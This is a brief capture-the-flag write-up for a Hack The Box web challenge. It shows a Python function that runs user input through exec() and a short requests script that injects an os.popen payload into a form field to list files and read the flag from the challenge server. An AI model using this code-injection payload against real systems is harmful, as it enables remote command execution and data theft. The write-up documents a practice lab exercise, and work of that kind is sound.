access: http://138.68.148.72:30557/debug

some rce vulnerabilities on this code:
def calc(recipe):
    global garage
    garage = {}
    try: exec(recipe, garage)
    except: pass

let's sending random exploit:
data = {'ingredient': 'our_var', 'measurements': '1337'}
data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("ls").read()'}

Final code: 
let's create our exploit:
#!/usr/bin/python3

import requests

data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("cat flag").read()'}

addr = 'http://138.68.148.72:30557'
r = requests.post(addr, data=data)

print(r.content)

resource:
https://s-3ntinel.github.io/hackthebox/challenges/web/baby_interdimensional_internet/baby_interdimensional_internet.html
